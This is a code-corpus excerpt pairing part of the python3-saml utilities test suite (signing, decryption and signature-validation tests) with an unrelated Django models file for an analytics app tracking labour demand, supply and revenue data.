'http_host': 'example.com',
'request_uri': '/example1/route/test/',
}
url_6 = OneLogin_Saml2_Utils.get_self_url_host(request_data_6) + '/example1/route/test/'
self.assertEqual(url_6, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_6))
def testGetStatus(self):
"""
Gets the status of a message
"""
xml = self.file_contents(join(self.data_path, 'responses', 'response1.xml.base64'))
xml = b64decode(xml)
dom = etree.fromstring(xml)
status = OneLogin_Saml2_Utils.get_status(dom)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_SUCCESS, status['code'])
xml2 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'status_code_responder.xml.base64'))
xml2 = b64decode(xml2)
dom2 = etree.fromstring(xml2)
status2 = OneLogin_Saml2_Utils.get_status(dom2)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_RESPONDER, status2['code'])
self.assertEqual('', status2['msg'])
xml3 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'status_code_responer_and_msg.xml.base64'))
xml3 = b64decode(xml3)
dom3 = etree.fromstring(xml3)
status3 = OneLogin_Saml2_Utils.get_status(dom3)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_RESPONDER, status3['code'])
self.assertEqual('something_is_wrong', status3['msg'])
xml_inv = self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_status.xml.base64'))
xml_inv = b64decode(xml_inv)
dom_inv = etree.fromstring(xml_inv)
self.assertRaisesRegexp(Exception, 'Missing Status on response',
OneLogin_Saml2_Utils.get_status, dom_inv)
xml_inv2 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_status_code.xml.base64'))
xml_inv2 = b64decode(xml_inv2)
dom_inv2 = etree.fromstring(xml_inv2)
self.assertRaisesRegexp(Exception, 'Missing Status Code on response',
OneLogin_Saml2_Utils.get_status, dom_inv2)
def testParseDuration(self):
"""
Tests the parse_duration method of the OneLogin_Saml2_Utils
"""
duration = 'PT1393462294S'
timestamp = 1393876825
parsed_duration = OneLogin_Saml2_Utils.parse_duration(duration, timestamp)
self.assertEqual(2787339119, parsed_duration)
parsed_duration_2 = OneLogin_Saml2_Utils.parse_duration(duration)
self.assertTrue(parsed_duration_2 > parsed_duration)
invalid_duration = 'PT1Y'
self.assertRaisesRegexp(Exception, 'Unrecognised ISO 8601 date format',
OneLogin_Saml2_Utils.parse_duration, invalid_duration)
new_duration = 'P1Y1M'
parsed_duration_4 = OneLogin_Saml2_Utils.parse_duration(new_duration, timestamp)
self.assertEqual(1428091225, parsed_duration_4)
neg_duration = '-P14M'
parsed_duration_5 = OneLogin_Saml2_Utils.parse_duration(neg_duration, timestamp)
self.assertEqual(1357243225, parsed_duration_5)
def testParseSAML2Time(self):
"""
Tests the parse_SAML_to_time method of the OneLogin_Saml2_Utils
"""
time = 1386650371
saml_time = '2013-12-10T04:39:31Z'
self.assertEqual(time, OneLogin_Saml2_Utils.parse_SAML_to_time(saml_time))
self.assertRaisesRegexp(Exception, 'does not match format',
OneLogin_Saml2_Utils.parse_SAML_to_time, 'invalidSAMLTime')
        # Now test if toolkit supports milliseconds
saml_time2 = '2013-12-10T04:39:31.120Z'
self.assertEqual(time, OneLogin_Saml2_Utils.parse_SAML_to_time(saml_time2))
def testParseTime2SAML(self):
"""
Tests the parse_time_to_SAML method of the OneLogin_Saml2_Utils
"""
time = 1386650371
saml_time = '2013-12-10T04:39:31Z'
self.assertEqual(saml_time, OneLogin_Saml2_Utils.parse_time_to_SAML(time))
self.assertRaisesRegexp(Exception, 'could not convert string to float',
OneLogin_Saml2_Utils.parse_time_to_SAML, 'invalidtime')
def testGetExpireTime(self):
"""
Tests the get_expire_time method of the OneLogin_Saml2_Utils
"""
self.assertEqual(None, OneLogin_Saml2_Utils.get_expire_time())
self.assertNotEqual(None, OneLogin_Saml2_Utils.get_expire_time('PT360000S'))
self.assertEqual('1291955971', OneLogin_Saml2_Utils.get_expire_time('PT360000S', '2010-12-10T04:39:31Z'))
self.assertEqual('1291955971', OneLogin_Saml2_Utils.get_expire_time('PT360000S', 1291955971))
self.assertNotEqual('3311642371', OneLogin_Saml2_Utils.get_expire_time('PT360000S', '2074-12-10T04:39:31Z'))
self.assertNotEqual('3311642371', OneLogin_Saml2_Utils.get_expire_time('PT360000S', 1418186371))
def testGenerateNameIdWithSPNameQualifier(self):
"""
Tests the generateNameId method of the OneLogin_Saml2_Utils
"""
name_id_value = 'ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde'
entity_id = 'http://stuff.com/endpoints/metadata.php'
name_id_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified'
name_id = OneLogin_Saml2_Utils.generate_name_id(name_id_value, entity_id, name_id_format)
expected_name_id = '<saml:NameID SPNameQualifier="http://stuff.com/endpoints/metadata.php" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified">ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde</saml:NameID>'
self.assertEqual(expected_name_id, name_id)
settings_info = self.loadSettingsJSON()
x509cert = settings_info['idp']['x509cert']
key = OneLogin_Saml2_Utils.format_cert(x509cert)
name_id_enc = OneLogin_Saml2_Utils.generate_name_id(name_id_value, entity_id, name_id_format, key)
expected_name_id_enc = '<saml:EncryptedID><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Type="http://www.w3.org/2001/04/xmlenc#Element">\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/>\n<dsig:KeyInfo xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">\n<xenc:EncryptedKey>\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/>\n<xenc:CipherData>\n<xenc:CipherValue>'
self.assertIn(expected_name_id_enc, name_id_enc)
    def testGenerateNameId(self):
"""
Tests the generateNameId method of the OneLogin_Saml2_Utils
"""
name_id_value = 'ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde'
name_id_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified'
name_id = OneLogin_Saml2_Utils.generate_name_id(name_id_value, None, name_id_format)
expected_name_id = '<saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified">ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde</saml:NameID>'
self.assertEqual(expected_name_id, name_id)
settings_info = self.loadSettingsJSON()
x509cert = settings_info['idp']['x509cert']
key = OneLogin_Saml2_Utils.format_cert(x509cert)
name_id_enc = OneLogin_Saml2_Utils.generate_name_id(name_id_value, None, name_id_format, key)
expected_name_id_enc = '<saml:EncryptedID><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Type="http://www.w3.org/2001/04/xmlenc#Element">\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/>\n<dsig:KeyInfo xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">\n<xenc:EncryptedKey>\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/>\n<xenc:CipherData>\n<xenc:CipherValue>'
self.assertIn(expected_name_id_enc, name_id_enc)
def testCalculateX509Fingerprint(self):
"""
Tests the calculateX509Fingerprint method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
cert_path = settings.get_cert_path()
key = self.file_contents(cert_path + 'sp.key')
cert = self.file_contents(cert_path + 'sp.crt')
self.assertEqual(None, OneLogin_Saml2_Utils.calculate_x509_fingerprint(key))
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert))
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha1'))
self.assertEqual('c51cfa06c7a49767f6eab18238eae1c56708e29264da3d11f538a12cd2c357ba', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha256'))
self.assertEqual('bc5826e6f9429247254bae5e3c650e6968a36a62d23075eb168134978d88600559c10830c28711b2c29c7947c0c2eb1d', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha384'))
self.assertEqual('3db29251b97559c67988ea0754cb0573fc409b6f75d89282d57cfb75089539b0bbdb2dcd9ec6e032549ecbc466439d5992e18db2cf5494ca2fe1b2e16f348dff', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha512'))
def testDeleteLocalSession(self):
"""
Tests the delete_local_session method of the OneLogin_Saml2_Utils
"""
global local_session_test
local_session_test = 1
OneLogin_Saml2_Utils.delete_local_session()
self.assertEqual(1, local_session_test)
        dscb = lambda: self.session_clear()
OneLogin_Saml2_Utils.delete_local_session(dscb)
self.assertEqual(0, local_session_test)
    def session_clear(self):
"""
        Auxiliary method to test the delete_local_session method of the OneLogin_Saml2_Utils
"""
global local_session_test
local_session_test = 0
def testFormatFingerPrint(self):
"""
Tests the format_finger_print method of the OneLogin_Saml2_Utils
"""
finger_print_1 = 'AF:E7:1C:28:EF:74:0B:C8:74:25:BE:13:A2:26:3D:37:97:1D:A1:F9'
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.format_finger_print(finger_print_1))
finger_print_2 = 'afe71c28ef740bc87425be13a2263d37971da1f9'
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.format_finger_print(finger_print_2))
def testDecryptElement(self):
"""
Tests the decrypt_element method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
key = settings.get_sp_key()
xml_nameid_enc = b64decode(self.file_contents(join(self.data_path, 'responses', 'response_encrypted_nameid.xml.base64')))
dom_nameid_enc = etree.fromstring(xml_nameid_enc)
encrypted_nameid_nodes = dom_nameid_enc.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data = encrypted_nameid_nodes[0]
decrypted_nameid = OneLogin_Saml2_Utils.decrypt_element(encrypted_data, key)
self.assertEqual('{%s}NameID' % OneLogin_Saml2_Constants.NS_SAML, decrypted_nameid.tag)
self.assertEqual('2de11defd199f8d5bb63f9b7deb265ba5c675c10', decrypted_nameid.text)
xml_assertion_enc = b64decode(self.file_contents(join(self.data_path, 'responses', 'valid_encrypted_assertion_encrypted_nameid.xml.base64')))
dom_assertion_enc = etree.fromstring(xml_assertion_enc)
encrypted_assertion_enc_nodes = dom_assertion_enc.find('.//saml:EncryptedAssertion', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_assert = encrypted_assertion_enc_nodes[0]
decrypted_assertion = OneLogin_Saml2_Utils.decrypt_element(encrypted_data_assert, key)
self.assertEqual('{%s}Assertion' % OneLogin_Saml2_Constants.NS_SAML, decrypted_assertion.tag)
self.assertEqual('_6fe189b1c241827773902f2b1d3a843418206a5c97', decrypted_assertion.get('ID'))
encrypted_nameid_nodes = decrypted_assertion.xpath('./saml:Subject/saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data = encrypted_nameid_nodes[0][0]
decrypted_nameid = OneLogin_Saml2_Utils.decrypt_element(encrypted_data, key)
self.assertEqual('{%s}NameID' % OneLogin_Saml2_Constants.NS_SAML, decrypted_nameid.tag)
self.assertEqual('457bdb600de717891c77647b0806ce59c089d5b8', decrypted_nameid.text)
key_2_file_name = join(self.data_path, 'misc', 'sp2.key')
f = open(key_2_file_name, 'r')
key2 = f.read()
f.close()
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data, key2)
key_3_file_name = join(self.data_path, 'misc', 'sp2.key')
f = open(key_3_file_name, 'r')
key3 = f.read()
f.close()
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data, key3)
xml_nameid_enc_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'encrypted_nameID_without_EncMethod.xml.base64')))
dom_nameid_enc_2 = etree.fromstring(xml_nameid_enc_2)
encrypted_nameid_nodes_2 = dom_nameid_enc_2.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_2 = encrypted_nameid_nodes_2[0]
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data_2, key)
xml_nameid_enc_3 = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'encrypted_nameID_without_keyinfo.xml.base64')))
dom_nameid_enc_3 = etree.fromstring(xml_nameid_enc_3)
encrypted_nameid_nodes_3 = dom_nameid_enc_3.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_3 = encrypted_nameid_nodes_3[0]
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data_3, key)
def testAddSign(self):
"""
Tests the add_sign method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
key = settings.get_sp_key()
cert = settings.get_sp_cert()
xml_authn = b64decode(self.file_contents(join(self.data_path, 'requests', 'authn_request.xml.base64')))
xml_authn_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed)
res = parseString(xml_authn_signed)
ds_signature = res.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature.tagName)
xml_authn_dom = parseString(xml_authn)
xml_authn_signed_2 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_dom.toxml(), key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_2)
res_2 = parseString(xml_authn_signed_2)
ds_signature_2 = res_2.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_2.tagName)
xml_authn_signed_3 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_dom.firstChild.toxml(), key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_3)
res_3 = parseString(xml_authn_signed_3)
ds_signature_3 = res_3.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_3.tagName)
xml_authn_etree = etree.fromstring(xml_authn)
xml_authn_signed_4 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_etree, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_4)
res_4 = parseString(xml_authn_signed_4)
ds_signature_4 = res_4.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_4.tagName)
xml_authn_signed_5 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_etree, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_5)
res_5 = parseString(xml_authn_signed_5)
ds_signature_5 = res_5.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_5.tagName)
xml_logout_req = b64decode(self.file_contents(join(self.data_path, 'logout_requests', 'logout_request.xml.base64')))
xml_logout_req_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_logout_req, key, cert))
self.assertIn('<ds:SignatureValue>', xml_logout_req_signed)
res_6 = parseString(xml_logout_req_signed)
ds_signature_6 = res_6.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_6.tagName)
xml_logout_res = b64decode(self.file_contents(join(self.data_path, 'logout_responses', 'logout_response.xml.base64')))
xml_logout_res_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_logout_res, key, cert))
self.assertIn('<ds:SignatureValue>', xml_logout_res_signed)
res_7 = parseString(xml_logout_res_signed)
ds_signature_7 = res_7.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_7.tagName)
xml_metadata = self.file_contents(join(self.data_path, 'metadata', 'metadata_settings1.xml'))
xml_metadata_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_metadata, key, cert))
self.assertIn('<ds:SignatureValue>', xml_metadata_signed)
res_8 = parseString(xml_metadata_signed)
ds_signature_8 = res_8.firstChild.firstChild.nextSibling.firstChild.nextSibling
self.assertIn('ds:Signature', ds_signature_8.tagName)
def testValidateSign(self):
"""
Tests the validate_sign method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
idp_data = settings.get_idp_data()
cert = idp_data['x509cert']
settings_2 = OneLogin_Saml2_Settings(self.loadSettingsJSON('settings2.json'))
idp_data2 = settings_2.get_idp_data()
cert_2 = idp_data2['x509cert']
fingerprint_2 = OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert_2)
fingerprint_2_256 = OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert_2, 'sha256')
try:
self.assertFalse(OneLogin_Saml2_Utils.validate_sign('', cert))
except Exception as e:
self.assertEqual('Empty string supplied as input', str(e))
# expired cert
xml_metadata_signed = self.file_contents(join(self.data_path, 'metadata', 'signed_metadata_settings1.xml'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed, cert, validatecert=True))
xml_metadata_signed_2 = self.file_contents(join(self.data_path, 'metadata', 'signed_metadata_settings2.xml'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, None, fingerprint_2))
xml_response_msg_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_message_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert, validatecert=True))
# modified cert
other_cert_path = join(dirname(__file__), '..', '..', '..', 'certs')
f = open(other_cert_path + '/certificate1', 'r')
cert_x = f.read()
f.close()
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert_x))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed, cert_x, validatecert=True))
xml_response_msg_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_message_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2, 'sha1'))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_msg_signed_2, None, fingerprint_2_256, 'sha256'))
xml_response_assert_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_assertion_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed, cert, validatecert=True))
xml_response_assert_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'signed_assertion_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_assert_signed_2, None, fingerprint_2))
xml_response_double_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'double_signed_response.xml.base64')))
# expired cert
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed, cert))
# expired cert, verified it
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed, cert, validatecert=True))
xml_response_double_signed_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'double_signed_response2.xml.base64')))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed_2, cert_2))
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(xml_response_double_signed_2, None, fingerprint_2))
dom = parseString(xml_response_msg_signed_2)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(dom.toxml(), cert_2))
dom.firstChild.firstChild.firstChild.nodeValue = 'https://idp.example.com/simplesaml/saml2/idp/metadata.php'
dom.firstChild.getAttributeNode('ID').nodeValue = u'_34fg27g212d63k1f923845324475802ac0fc24530b'
# Reference validation failed
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(dom.toxml(), cert_2))
invalid_fingerprint = 'afe71c34ef740bc87434be13a2263d31271da1f9'
# Wrong fingerprint
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(xml_metadata_signed_2, None, invalid_fingerprint))
dom_2 = parseString(xml_response_double_signed_2)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(dom_2.toxml(), cert_2))
dom_2.firstChild.firstChild.firstChild.nodeValue = 'https://example.com/other-idp'
# Modified message
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(dom_2.toxml(), cert_2))
dom_3 = parseString(xml_response_double_signed_2)
assert_elem_3 = dom_3.firstChild.firstChild.nextSibling.nextSibling.nextSibling
assert_elem_3.setAttributeNS(OneLogin_Saml2_Constants.NS_SAML, 'xmlns:saml', OneLogin_Saml2_Constants.NS_SAML)
self.assertTrue(OneLogin_Saml2_Utils.validate_sign(assert_elem_3.toxml(), cert_2))
no_signed = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_signature.xml.base64')))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(no_signed, cert))
no_key = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_key.xml.base64')))
self.assertFalse(OneLogin_Saml2_Utils.validate_sign(no_key, cert))
|
pitbulk/python3-saml
|
tests/src/OneLogin/saml2_tests/utils_test.py
|
Python
|
bsd-3-clause
| 40,950
|
# -*- coding: utf-8 -*-
"""
analytics.models
Models for Demand and Supply data
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: see LICENSE for more details.
"""
import operator
from django.db import models
import django.contrib.admin
from admin.models import Occupation, Institution, Company, SubSector
__all__ = ['DEGREE_CHOICES', 'REGION_CHOICES', 'State', 'City', 'SupplyBase',
'DemandData', 'CompanyYearData', 'DiversityRatioLevel',
'DiversityRatioSubsector', 'GenderDiversity', 'ITSpend',
'RevenueSubsector', 'RevenueOccupation', 'RevenueTotal',
'TalentSaturation']
DEGREE_CHOICES = (
('UG', 'Undergraduate Degree'),
('PG', 'Postgraduate Degree'),
('DOC', 'Ph.D/M.Phil'),
('PSD', 'Post School Diploma'),
('PGD', 'Post Graduate Diploma'),
('UNK', 'Unknown'),
)
REGION_CHOICES = (
('NORTH', 'North'),
('SOUTH', 'South'),
('EAST', 'East'),
('WEST', 'West'),
('CENTRAL', 'Central'),
)
class State(models.Model):
"""
States
"""
name = models.CharField(max_length=50, default=None, unique=True)
region = models.CharField(max_length=12, choices=REGION_CHOICES)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('name', 'region',)
def __unicode__(self):
"""
Returns object display name
"""
return self.name
class City(models.Model):
"""
Cities
"""
name = models.CharField(max_length=50, default=None)
state = models.ForeignKey('State')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('name', 'state',)
verbose_name_plural = 'Cities'
def __unicode__(self):
"""
Returns object display name
"""
return "%s,%s" % (self.name, self.state)
class SupplyBase(models.Model):
"""
Demand supply data
"""
year = models.IntegerField()
city = models.ForeignKey('City')
occupation = models.ForeignKey(Occupation)
institution = models.ForeignKey(Institution)
degree = models.CharField(max_length=3, choices=DEGREE_CHOICES,
default=None)
supply = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'city', 'occupation', 'institution',
'degree',)
verbose_name_plural = 'SupplyBase'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s,%s" % (self.year, self.city, self.occupation,)
class DemandData(models.Model):
"""
Demand data
"""
year = models.IntegerField()
city = models.ForeignKey('City')
occupation = models.ForeignKey(Occupation)
company = models.ForeignKey(Company)
demand = models.IntegerField()
headcount = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'city', 'occupation', 'company',)
verbose_name_plural = 'DemandBase'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s,%s" % (self.year, self.city, self.occupation,)
class CompanyYearData(models.Model):
"""
Revenue, Headcount data for companies annually
"""
year = models.IntegerField()
company = models.ForeignKey(Company)
revenue = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'company', )
verbose_name_plural = 'Company Annual Data'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.company, )
class DiversityRatioLevel(models.Model):
"""
Diversity ratio for levels
"""
year = models.IntegerField(unique=True)
male_leadership = models.IntegerField(
verbose_name='Percent Male in Leadership roles'
)
male_entry = models.IntegerField(
verbose_name='Percent Male in Entry Level roles'
)
male_middle = models.IntegerField(
verbose_name='Percent Male in Middle Level roles'
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
@property
def female_leadership(self):
"Percent Females in leadership level roles"
return 100 - self.male_leadership
@property
def female_entry(self):
"Percent Females in entry level roles"
return 100 - self.male_entry
@property
def female_middle(self):
"Percent Females in middle level roles"
return 100 - self.male_middle
class Meta:
verbose_name_plural = 'Diversity Ratio for Experience Levels'
def __unicode__(self):
"""
Returns object display name
"""
return "%d" % (self.year, )
class DiversityRatioSubsector(models.Model):
"""
Diversity ratio for subsector
"""
year = models.IntegerField()
subsector = models.ForeignKey(SubSector, verbose_name='Sub-sector')
male = models.IntegerField(verbose_name='Percent males in subsector')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
@property
def female(self):
"Percent Females in subsector"
return 100 - self.male
class Meta:
unique_together = ('year', 'subsector', )
verbose_name_plural = 'Diversity Ratio for Subsector'
def __unicode__(self):
"""
Returns object display name
"""
return "%d, %s" % (self.year, self.subsector, )
class GenderDiversity(models.Model):
"""
Gender diversity as per course
"""
year = models.IntegerField()
category = models.CharField(max_length=60)
male = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'category', )
verbose_name_plural = 'Gender Diversity'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.category, )
class ITSpend(models.Model):
"""
IT Spend data
"""
year = models.IntegerField()
sub_sector = models.ForeignKey(SubSector, verbose_name='Sub-sector')
world_spend = models.IntegerField(verbose_name='World IT Spend')
india_revenue = models.IntegerField(verbose_name='Indian IT Revenue')
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'sub_sector', )
verbose_name_plural = 'IT Spend'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.sub_sector, )
class RevenueSubsector(models.Model):
"""
Revenue per subsector
"""
year = models.IntegerField()
sub_sector = models.ForeignKey(SubSector)
revenue = models.IntegerField()
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'sub_sector', )
verbose_name_plural = 'Revenue by Subsector'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.sub_sector, )
class RevenueOccupation(models.Model):
"""
Revenue by occupation
"""
year = models.IntegerField()
occupation = models.ForeignKey(Occupation)
revenue = models.IntegerField()
cagr_next_7_years = models.IntegerField(
verbose_name='CAGR % for next 7 years'
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('year', 'occupation', )
verbose_name_plural = 'Revenue by occupation'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%s" % (self.year, self.occupation, )
@property
def revenue_after_7year(self):
return int(self.revenue * (1 + self.cagr_next_7_years / 100.0) ** 7)
class RevenueTotal(models.Model):
"""
Total revenue
"""
year = models.IntegerField(unique=True)
revenue = models.IntegerField()
most_likely_growth = models.IntegerField(
verbose_name='Most likely growth percent',
blank=True,
null=True
)
optimistic_growth = models.IntegerField(
        verbose_name='Optimistic growth percent',
blank=True,
null=True
)
create_date = models.DateTimeField(auto_now_add=True)
write_date = models.DateTimeField(auto_now=True)
class Meta:
verbose_name_plural = 'Total Revenues'
def __unicode__(self):
"""
Returns object display name
"""
return "%d,%d" % (self.year, self.revenue, )
@property
def growth_series(self):
"""
Return growth and most likely series
"""
resultset = RevenueTotal.objects.filter(year__lte=self.year)
optimistic_series = []
most_likely_series = []
years = []
for result in resultset:
most_likely_series.append(result.revenue)
optimistic_series.append(result.revenue)
years.append(result.year)
for i in range(7):
optimistic_series.append(
int(optimistic_series[-1] *
(1 + self.optimistic_growth / 100.0))
)
most_likely_series.append(
int(most_likely_series[-1] *
(1 + self.most_likely_growth / 100.0))
)
years.append(years[-1] + 1)
return {
'years': years,
'optimistic_series': optimistic_series,
'most_likely_series': most_likely_series,
}
class TalentSaturation(models.Model):
"""
Model for talent saturation
    We keep headcount here because the sum derived from the other models
    does not match the figure in the worksheet, perhaps due to missing data
    from some companies.
"""
year = models.IntegerField(unique=True)
headcount = models.IntegerField()
attrition_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="Annual Attrition (%)",
default=5.0,
)
cagr_pc = models.DecimalField(
max_digits=5,
decimal_places=2,
verbose_name="CAGR (%)",
default=8.6
)
